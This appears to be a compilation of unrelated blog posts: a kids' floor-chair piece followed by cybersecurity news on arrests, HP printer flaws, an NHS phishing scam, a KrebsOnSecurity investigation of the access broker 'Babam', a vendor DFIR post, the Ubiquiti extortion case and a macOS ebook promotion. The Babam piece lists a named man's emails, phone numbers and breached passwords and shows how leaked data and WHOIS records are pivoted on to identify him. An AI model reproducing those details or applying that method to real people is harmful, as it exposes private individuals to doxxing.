One of the benefits of using a floor chair is that it encourages kids to move around and stretch their bodies throughout the day. This is important for developing strong muscles and bones. Floor chairs also help kids use their imaginations and creativity, as they can use the chairs for all sorts of activities.

Another benefit of floor chairs is that they are often well-padded and comfortable. This makes them great for young children to use, as the padding helps to relieve pressure points when sitting down. It also reduces friction between the skin and fabric or wood material, leading to rashes.

In comparison, traditional chairs have been designed primarily for adults, so it’s no surprise that they are not always comfortable for children. They often do not have the proper padding, and they can be pretty stiff and uncomfortable.

Kids’ floor chairs are an excellent way for children to have a comfortable place to sit and play without having to use a regular chair. They offer a safe and healthy alternative for children who don’t like to sit in chairs, and they can be used for temporary seating and napping.

Besides being safe and comfortable, the chair needed to be durable and easy to use. It should also be possible to move them around on the floor or stack them up for storage.

However, in conclusion, it is up to the individual child to decide which option is better for them. Floor chairs offer several benefits over traditional chairs, including improved physical and mental development. But in the end, it is just a simple matter of personal preference.

The post Kids’ floor chair – a versatile sitting alternative that will leave you floored appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 49

The Good

It’s been a great week for law enforcement. Just after we went to press last week, Interpol announced the arrest of over 1000 cyber criminals in an operation codenamed HAECHI-II (In Korea, Haechi is a popular mythical animal widely used as a symbol of justice).

Source

In raw arrests, that’s twice as successful as its predecessor, HAECHI-I earlier this year, which itself resulted in the arrest of 500 cyber fraudsters. The latest operation took place in twenty countries and intercepted $27m of illicit funds. Cyber cops also froze 2,350 bank accounts connected to various forms of online crime, including money laundering, investment fraud and romance scams.

Meanwhile, there have been welcome developments in a case we reported on back in October involving bulletproof hosting services aiding and abetting cybercrime. Prosecutors have now sentenced the third of four men indicted under RICO charges.

Aleksandr Grichishkin received a 5-year prison term for his role as a “founder and leader” of a gang that rented out IP addresses, servers and internet domains to spread malware such as Zeus, SpyEye, Citadel and the Blackhole Exploit Kit. Grichishkin’s sentence follows two- and four-year terms handed down to his co-conspirators. A fourth individual, Andrei Skvortsov, is yet to be sentenced. He faces a maximum penalty of 20 years.

The Bad

“Watch out for the quiet ones at the back” is a good adage in security in general, and when it comes to cybersecurity in particular, this means unnoticed devices like printers and IoT machines that can sit on our networks relatively forgotten in terms of endpoint protection.

This week, HP printers came to the forefront again as researchers disclosed details of flaws that could be used by attackers in remote as well as physical attacks. In one scenario, a user could be socially engineered to print out a malicious PDF containing an exploit for a font-parsing vulnerability. Just printing the document can give an attacker code execution rights, allowing data theft or lateral movement across the network.

Source

On top of that, one of the vulnerabilities found is wormable, meaning that compromising one printer on the network could lead to the compromise of any other connected devices that are vulnerable to the same bugs. Researchers say around 150 models of multi-function printers (MFPs) are affected. The flaws, tracked as CVE-2021-39237 and CVE-2021-39238, were patched last month by HP.

The disclosure follows SentinelLabs’ discovery in July of high severity flaws in HP, Samsung and Xerox printer drivers affecting millions of printers worldwide and which could allow unprivileged users to run code in kernel mode.

While exploitation of such attacks are by no means “low-hanging fruit”, the fact that network printers are often forgotten, unpatched and unprotected means they could present an attractive target for attackers. Ensuring you have visibility into everything connected to your network, particularly IoT devices like printers, is a must.

The Ugly

As the world continues to wrestle with the ongoing COVID-19 pandemic, threat actors have lost no time exploiting fears around the new Omicron variant in phishing lures.

This week’s egregious example involves an email scam purporting to come from the UK’s National Health Service offering recipients a free Omicron PCR test.

The email, which comes from a scam email address (contact-nhs@nhscontact.com), contains a “Get it now” button with a link to a fake NHS website. According to UK consumer watchdog Which?, the site directs users to enter personal details including full name, date of birth, address and phone number.

The email also contains plenty of the usual scare tactics to encourage people to click through to the malicious website. “What happens if you decline a COVID-19 Omicron test?”, the email asks, and goes on to state that “…we warned that testing is in the best interests of themselves, friends, and family. People who do not consent…must be isolated”.

The fake NHS website looks convincing and includes reassurances about “protecting the privacy” of personal information.

Source

The “free” offer turns out to require victims to pay £1.24 for delivery of the phony test. The small amount of the charge serves both to add authenticity and to disguise the scammers’ real intent: gathering the payment details of the victims for account takeover, fraud, and identity theft.

Anyone suspecting that they may have fallen victim to the scam are advised to contact their bank immediately, cancel any cards used in the transaction, and to change account passwords. The Which? consumer service also provides help on how to retrieve money lost in a scam.

Who Is the Network Access Broker ‘Babam’?

Rarely do cybercriminal gangs that deploy ransomware gain the initial access to the target themselves. More commonly, that access is purchased from a cybercriminal broker who specializes in acquiring remote access credentials — such as usernames and passwords needed to remotely connect to the target’s network. In this post we’ll look at the clues left behind by “Babam,” the handle chosen by a cybercriminal who has sold such access to ransomware groups on many occasions over the past few years.

Since the beginning of 2020, Babam has set up numerous auctions on the Russian-language cybercrime forum Exploit, mainly selling virtual private networking (VPN) credentials stolen from various companies. Babam has authored more than 270 posts since joining Exploit in 2015, including dozens of sales threads. However, none of Babam’s posts on Exploit include any personal information or clues about his identity.

But in February 2016, Babam joined Verified, another Russian-language crime forum. Verified was hacked at least twice in the past five years, and its user database posted online. That information shows that Babam joined Verified using the email address “operns@gmail.com.” The latest Verified leak also exposed private messages exchanged by forum members, including more than 800 private messages that Babam sent or received on the forum over the years.

In early 2017, Babam confided to another Verified user via private message that he is from Lithuania. In virtually all of his forum posts and private messages, Babam can be seen communicating in transliterated Russian rather than by using the Cyrillic alphabet. This is common among cybercriminal actors for whom Russian is not their native tongue.

Cyber intelligence platform Constella Intelligence told KrebsOnSecurity that the operns@gmail.com address was used in 2016 to register an account at filmai.in, which is a movie streaming service catering to Lithuanian speakers. The username associated with that account was “bo3dom.”

A reverse WHOIS search via DomainTools.com says operns@gmail.com was used to register two domain names: bonnjoeder[.]com back in 2011, and sanjulianhotels[.]com (2017). It’s unclear whether these domains ever were online, but the street address on both records was “24 Brondeg St.” in the United Kingdom. [Full disclosure: DomainTools is a frequent advertiser on this website.]

A reverse search at DomainTools on “24 Brondeg St.” reveals one other domain: wwwecardone[.]com. The use of domains that begin with “www” is fairly common among phishers, and by passive “typosquatting” sites that seek to siphon credentials from legitimate websites when people mistype a domain, such as accidentally omitting the “.” after typing “www”.

A banner from the homepage of the Russian language cybercrime forum Verified.

Searching DomainTools for the phone number in the WHOIS records for wwwecardone[.]com  — +44.0774829141 — leads to a handful of similar typosquatting domains, including wwwebuygold[.]com and wwwpexpay[.]com. A different UK phone number in a more recent record for the wwwebuygold[.]com domain — 44.0472882112 — is tied to two more domains – howtounlockiphonefree[.]com, and portalsagepay[.]com. All of these domains date back to between 2012 and 2013.

The original registration records for the iPhone, Sagepay and Gold domains share an email address: devrian26@gmail.com. A search on the username “bo3dom” using Constella’s service reveals an account at ipmart-forum.com, a now-defunct forum concerned with IT products, such as mobile devices, computers and online gaming. That search shows the user bo3dom registered at ipmart-forum.com with the email address devrian27@gmail.com, and from an Internet address in Vilnius, Lithuania.

Devrian27@gmail.com was used to register multiple domains, including wwwsuperchange.ru back in 2008 (notice again the suspect “www” as part of the domain name). Gmail’s password recovery function says the backup email address for devrian27@gmail.com is bo3*******@gmail.com. Gmail accepts the address bo3domster@gmail.com as the recovery email for that devrian27 account.

According to Constella, the bo3domster@gmail.com address was exposed in multiple data breaches over the years, and in each case it used one of two passwords: “lebeda1” and “a123456“.

Searching in Constella for accounts using those passwords reveals a slew of additional “bo3dom” email addresses, including bo3dom@gmail.com.  Pivoting on that address in Constella reveals that someone with the name Vytautas Mockus used it to register an account at mindjolt.com, a site featuring dozens of simple puzzle games that visitors can play online.

At some point, mindjolt.com apparently also was hacked, because a copy of its database at Constella says the bo3dom@gmail.com used two passwords at that site: lebeda1 and a123456.

A reverse WHOIS search on “Vytautas Mockus” at DomainTools shows the email address devrian25@gmail.com was used in 2010 to register the domain name perfectmoney[.]co. This is one character off of perfectmoney[.]com, which is an early virtual currency that was quite popular with cybercriminals at the time. The phone number tied to that domain registration was “86.7273687“.

A Google search for “Vytautas Mockus” says there’s a person by that name who runs a mobile food service company in Lithuania called “Palvisa.” A report on Palvisa (PDF) purchased from Rekvizitai.vz — an official online directory of Lithuanian companies — says Palvisa was established in 2011 by a Vytautaus Mockus, using the phone number 86.7273687, and the email address bo3dom@gmail.com. The report states that Palvisa is active, but has had no employees other than its founder.

Reached via the bo3dom@gmail.com address, the 36-year-old Mr. Mockus expressed mystification as to how his personal information wound up in so many records. “I am not involved in any crime,” Mockus wrote in reply.

A rough mind map of the connections mentioned in this story.

The domains apparently registered by Babam over nearly 10 years suggest he started off mainly stealing from other cybercrooks. By 2015, Babam was heavily into “carding,” the sale and use of stolen payment card data. By 2020, he’d shifted his focus almost entirely to selling access to companies.

A profile produced by threat intelligence firm Flashpoint says Babam has received at least four positive feedback reviews on the Exploit cybercrime forum from crooks associated with the LockBit ransomware gang.

The ransomware collective LockBit giving Babam positive feedback for selling access to different victim organizations. Image: Flashpoint

According to Flashpoint, in April 2021 Babam advertised the sale of Citrix credentials for an international company that is active in the field of laboratory testing, inspection and certification, and that has more than $5 billion in annual revenues and more than 78,000 employees.

Flashpoint says Babam initially announced he’d sold the access, but later reopened the auction because the prospective buyer backed out of the deal. Several days later, Babam reposted the auction, adding more information about the depth of the illicit access and lowering his asking price. The access sold less than 24 hours later.

“Based on the provided statistics and sensitive source reporting, Flashpoint analysts assess with high confidence that the compromised organization was likely Bureau Veritas, an organization headquartered in France that operates in a variety of sectors,” the company concluded.

In November, Bureau Veritas acknowledged that it shut down its network in response to a cyber attack. The company hasn’t said whether the incident involved ransomware and if so what strain of ransomware, but its response to the incident is straight out of the playbook for responding to ransomware attacks. Bureau Veritas has not yet responded to requests for comment; its latest public statement on Dec. 2 provides no additional details about the cause of the incident.

Flashpoint notes that Babam’s use of transliterated Russian persists on both Exploit and Verified until around March 2020, when he switches over to using mostly Cyrillc in his forum comments and sales threads. Flashpoint said this could be an indication that a different person started using the Babam account since then, or more likely that Babam had only a tenuous grasp of Russian to begin with and that his language skills and confidence improved over time.

Lending credence to the latter theory is that Babam still makes linguistic errors in his postings that suggest Russian is not his original language, Flashpoint found.

“The use of double “n” in such words as “проданно” (correct – продано) and “сделанны” (correct – сделаны) by the threat actor proves that this style of writing is not possible when using machine translation since this would not be the correct spelling of the word,” Flashpoint analysts wrote.

“These types of grammatical errors are often found among people who did not receive sufficient education at school or if Russian is their second language,” the analysis continues. “In such cases, when someone tries to spell a word correctly, then by accident or unknowingly, they overdo the spelling and make these types of mistakes. At the same time, colloquial speech can be fluent or even native. This is often typical for a person who comes from the former Soviet Union states.”

3 Ways to Speed Up Investigations with Modern DFIR

A guest post by Jessica Stanford, CMO at Cado Security

When it comes to attack containment, time is of the essence. The speed at which security teams can dive deep to determine root cause and scope is essential to fully remediating an incident before it’s at risk of escalating. Delays or hurdles that prevent a thorough investigation from occurring have significant impact and leave your organization vulnerable to future breaches.

Once malicious activity is detected, security analysts need to be able to quickly understand its impact:

  • What happened?
  • When did it happen?
  • Is this the first time it happened?
  • How many machines were involved?
  • How did the attackers get in?
  • Has data left the environment?

However, using traditional digital forensics and incident response (DFIR) approaches, it can take days to weeks to manually capture and process the data needed to answer these pressing questions. To make matters worse, due to the heavy uplift and time required, incidents often get closed without digging deep enough.

That’s where the combination of the SentinelOne Singularity XDR platform and Cado Response can help — by delivering the data and context security teams need to quickly identify the root cause of incidents and enable faster response.

The SentinelOne Singularity XDR Platform provides the broad visibility needed to detect and respond to malicious activity in real-time across user endpoints, cloud workloads and IoT. Many DFIR investigations begin with a high-severity detection – SentinelOne provides best-in-class behavioral detection with Storyline, as evidenced by the 2021 MITRE Engenuity ATT&CK evaluations. SOC teams use SentinelOne to ‘stop the bleeding’ and perform automated responses, such as killing processes, quarantine a threat or rolling back the effects of ransomware.

SentinelOne Remote Script Orchestration (RSO) takes automation within incident response a step further to enable security and IT teams to remotely execute customizable remediation and response actions and to send custom scripts to one machine, a few hundred machines, or even millions of machines concurrently.

DFIR investigations take incident response a level further by analyzing additional forensic data such as memory and disk snapshots. Joint customers can use RSO to deploy Cado Response, which provides deep forensic-level analysis, enabling DFIR teams to respond to present and future cyberattacks faster.

SentinelOne and Cado Security’s joint solution enables security teams to take a modern approach to DFIR by speeding up cyber investigations in three ways.

1. Automated Capture

A forensics analysis often requires massive amounts of data. Complicating things even further, this data can live across countless regions, systems and users. Capturing, processing, and triaging the data required to conduct a detailed investigation using traditional methods is no easy task. Fortunately, automation flips the script. By automating the most tedious parts of a forensics investigation, including data capture and processing, security teams can drastically reduce the amount of time and effort that’s required to understand the root cause and impact of an incident.

2. Leverage The Cloud

As mentioned above, when it comes to forensic investigations, speed is of the essence. Forensic investigations require complete visibility, across on-premises, hybrid, and cloud environments. Gaining access to the data is step one. Then analysts need to normalize and preserve the data for an investigation. This can require extensive time and manual effort but results in no added value until the processing is complete.

Using SentinelOne, DFIR teams can gain visibility across all environments, whether they be user endpoints or enterprise workloads, whether on-premises, hybrid or in public cloud environments like Amazon Web Services. With RSO, Cado Response automatically processes data from endpoints of interest, leveraging the cloud for rapid processing of hundreds of files and systems in parallel to drastically reduce the time it takes to begin an investigation from days to minutes. The cloud enables security analysts to get access to the information they need, when they need it.

3. Managing DFIR At Scale

Using automation, RSO enables the scale and speed of deployment of forensic tools across the entire endpoint fleet to help teams manage IR processes at scale. From within SentinelOne, teams can seamlessly deploy Cado Response, view the status of script deployment, ensuring the complete forensic capture of all affected endpoints.

Capturing and processing 100% of the data from all impacted systems is a feat in and of itself, but it’s just the beginning of an investigation. Once the data is processed, security teams need to analyze it to identify the root cause and fully remediate an incident.

The challenge here is adding context and awareness to the data. Cado Response uses the power of machine learning-driven analytics and threat intelligence to correlate all systems, users, processes, files, and more. It also creates a complete timeline of events in a single pane of glass so analysts can immediately visualize the scope very quickly and seamlessly dive into important data. This enables them to conduct an investigation in aggregate rather than analyzing systems one by one.

Preventing Future Breaches

Conducting a thorough forensics investigation post breach is critical to identifying the root cause and preventing future breaches. That’s why ourCado Response’s recently announced partnership with SentinelOne is so important, as it delivers the breadth and depth security teams need to detect, investigate, and respond to incidents with unmatched speed.

SentinelOne Remote Script Orchestration (RSO) can alleviate the SOC burden for remote forensics and incident response. RSO allows customers to remotely investigate threats on multiple endpoints across the organization and enables them to easily manage their entire fleet. It lets incident responders run scripts to collect data and remotely respond to events on endpoints. Through SentinelOne’s Remote Script Orchestration (RSO) capability, security analysts can launch Cado Response to perform an in-depth forensic investigation across their SentinelOne Singularity Platform-protected endpoints in a single click, simplifying forensic data capture and accelerating triage.

Incident Responders can collect forensic artifacts, execute complex scripts and commands, install IR tools – like Cado Response – on thousands of endpoints simultaneously — Windows, Mac, and Linux, via the SentinelOne console or API. Remote Script Orchestration includes a Script Library from SentinelOne with scripts for all platforms, PowerShell for Windows, and bash scripts for Linux and macOS.

Singularity Marketplace
Extend the power of the Singularity XDR platform with our ecosystem of bite-sized, 1-click applications for unified prevention, detection, and response.

The Cado Response platform is powered by a cloud-based architecture, which automatically scales up and down to provide rapid processing when needed and saves costs when not, drastically reducing time to evidence and time to response. The Cado Response platform simplifies investigation, enabling analysts to easily pivot across evidence items including impacted systems, users, processes, files, and more, so they can rapidly visualize incident scope.

Conclusion

With powerful remote script orchestration within the SentinelOne Singularity Platform and the cloud-native DFIR capabilities of Cado Response, incident responders have an effective toolset for collecting, analyzing, and actioning forensic data from across the endpoint and cloud workload fleet.

Learn more about SentinelOne and Cado Security in this upcoming webinar:

Automation Flips the Script: Augmenting Real-Time Detection with Modern DFIR.

Ubiquiti Developer Charged With Extortion, Causing 2020 “Breach”

In January 2021, technology vendor Ubiquiti Inc. [NYSE:UI] disclosed that a breach at a third party cloud provider had exposed customer account credentials. In March, a Ubiquiti employee warned that the company had drastically understated the scope of the incident, and that the third-party cloud provider claim was a fabrication. On Wednesday, a former Ubiquiti developer was arrested and charged with stealing data and trying to extort his employer while pretending to be a whistleblower.

Federal prosecutors say Nickolas Sharp, a senior developer at Ubiquiti, actually caused the “breach” that forced Ubiquiti to disclose a cybersecurity incident in January. They allege that in late December 2020, Sharp applied for a job at another technology company, and then abused his privileged access to Ubiquiti’s systems at Amazon’s AWS cloud service and the company’s GitHub accounts to download large amounts of proprietary data.

Sharp’s indictment doesn’t specify how much data he allegedly downloaded, but it says some of the downloads took hours, and that he cloned approximately 155 Ubiquiti data repositories via multiple downloads over nearly two weeks.

On Dec. 28, other Ubiquiti employees spotted the unusual downloads, which had leveraged internal company credentials and a Surfshark VPN connection to hide the downloader’s true Internet address. Assuming an external attacker had breached its security, Ubiquiti quickly launched an investigation.

But Sharp was a member of the team doing the forensic investigation, the indictment alleges.

“At the time the defendant was part of a team working to assess the scope and damage caused by the incident and remediate its effects, all while concealing his role in committing the incident,” wrote prosecutors with the Southern District of New York.

According to the indictment, on January 7 a senior Ubiquiti employee received a ransom email. The message was sent through an IP address associated with the same Surfshark VPN. The ransom message warned that internal Ubiquiti data had been stolen, and that the information would not be used or published online as long as Ubiquiti agreed to pay 25 Bitcoin.

The ransom email also offered to identify a purportedly still unblocked “backdoor” used by the attacker for the sum of another 25 Bitcoin (the total amount requested was equivalent to approximately $1.9 million at the time). Ubiquiti did not pay the ransom demands.

Investigators say they were able to tie the downloads to Sharp and his work-issued laptop because his Internet connection briefly failed on several occasions while he was downloading the Ubiquiti data. Those outages were enough to prevent Sharp’s Surfshark VPN connection from functioning properly — thus exposing his Internet address as the source of the downloads.

When FBI agents raided Sharp’s residence on Mar. 24, he reportedly maintained his innocence and told agents someone else must have used his Paypal account to purchase the Surfshark VPN subscription.

Several days after the FBI executed its search warrant, Sharp “caused false or misleading news stories to be published about the incident,” prosecutors say. Among the claims made in those news stories was that Ubiquiti had neglected to keep access logs that would allow the company to understand the full scope of the intrusion. In reality, the indictment alleges, Sharp had shortened to one day the amount of time Ubiquiti’s systems kept certain logs of user activity in AWS.

“Following the publication of these articles, between Tuesday, March 30, 2021 and Wednesday March 31, [Ubiquiti’s] stock price fell approximately 20 percent, losing over four billion dollars in market capitalization,” the indictment states.

Sharp faces four criminal counts, including wire fraud, intentionally damaging protected computers, transmission of interstate communications with intent to extort, and making false statements to the FBI.

News of Sharp’s arrest was first reported by BleepingComputer, which wrote that while the Justice Department didn’t name Sharp’s employer in its press release or indictment, all of the details align with previous reporting on the Ubiquiti incident and information presented in Sharp’s LinkedIn account. A link to the indictment is here (PDF).

The Complete Guide to Understanding Apple Mac Security for Enterprise | Read the Free Ebook

SentinelOne is delighted to release its third, comprehensive Mac-focused ebook for enterprise security teams, the Complete Guide to Understanding Apple Mac Security for Enterprise.

Following on from How To Reverse macOS malware and A Guide to macOS Threat Hunting & Incident Response, our latest macOS ebook is an all encompassing guide to the native security technologies built-in to macOS: how they work, where they fail, what they protect against, and what they don’t.

Who is the macOS Security Ebook For?

The SentinelOne Complete Guide to Understanding Apple Mac Security for Enterprise is an essential reference for anyone needing to understand the strengths and weaknesses of the security controls built into Apple Macs and the macOS platform.

The guide covers macOS right up to and including the latest release of macOS 12 Monterey and answers many common questions asked by system administrators and security teams managing Mac devices, including:

  • How secure are Macs by design?
  • Are third-party AV security controls required on macOS?
  • What kind of security software works best on macOS?
  • Which approaches to macOS security are the most effective?
  • What sort of threats do businesses with macOS fleets face in 2021?

What Will You Learn from the macOS Security Ebook?

In the guide, you’ll find detailed sections on areas such as:

  • Architecture & Codesigning: Does the new M1 architecture provide increased security over Intel machines? Is it still possible to run unsigned malicious code on macOS Monterey on both of these architectures?
  • Gatekeeper: How easy is it for malware or malicious insiders to circumvent Gatekeeper’s controls? Are these bypasses used by in-the-wild malware?
  • Notarization & OCSP: What do these technologies achieve, and what are their limitations? How does malware circumvent these checks?
  • XProtect and MRT: How do these technologies work on modern versions of macOS, how can you test if they are protecting against specific kinds of malware, and how effective are they?
  • TCC Privacy controls: How well does TCC protect sensitive data on a Mac, and in what situations does TCC fail to work?

What Kind of Malware Threats Target macOS?

Throughout, the guide discusses the Mac’s built-in security technologies with references to real, in-the-wild malware such as XCSSET, Shlayer, Bundlore, Adload and others, describing exactly how security breaches can occur on systems that remain unprotected by additional security controls.

XCSSET malware tries to social engineer victims for additional privileges

Administrators and security teams charged with protecting macOS endpoints will learn about vulnerabilities in Apple’s platform that can be and are used by threat actors to compromise Mac devices, circumvent code signing requirements, beat Gatekeeper, bypass OCSP and Notarization, and defeat TCC privacy protections.

Learn How to Test Mac AV Software

SentinelOne’s Complete Guide to Understanding Apple Mac Security for Enterprise also includes sections on how to test security products against known malware samples, and what to look out for when evaluating third-party security products for Mac. Learn why, for example, a revoked code signature does not mean your Macs are protected from a particular malware family.

Only last month, we saw how a new targeted threat, macOS.Macma, was able to beat Apple’s on-device security and yet was easily detected by third-party behavioral engines like SentinelOne.

SentinelOne’s behavioral AI detects macOS.Macma on execution without pre-defined signatures

This guide also explains, with examples, how Mac admins can test for themselves whether the Mac’s own AV tools, XProtect and MRT (Malware Removal Tool), have been updated to protect against a particular threat or not. Learn how to test which malware you are protected from, and which you are not.

Why You Should Read the macOS Security Ebook

Apple Mac computers are increasingly common in today’s enterprise. Despite its shared Unix heritage with Linux, Apple’s macOS is idiosyncratic, as are the attack vectors that it is susceptible to, and the security implications of running a fleet of Macs in the enterprise is not widely understood. This is true even more so now that Apple has moved away from Intel architecture to its own implementation of ARM, ‘Apple silicon’.

Throughout this ebook, we illustrate areas where Macs face security risks by referencing real, in-the-wild malware that we have seen emerge or adapt in the last 12 to 18 months,

It’s vital that enterprise security teams managing a fleet of Macs are up-to-date with just how the latest threats can and do target the macOS platform.

This guide will help security teams bridge the gap and understand how best to protect Macs in the enterprise.

The Complete Guide to Understanding Apple Mac Security for Enterprise
Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.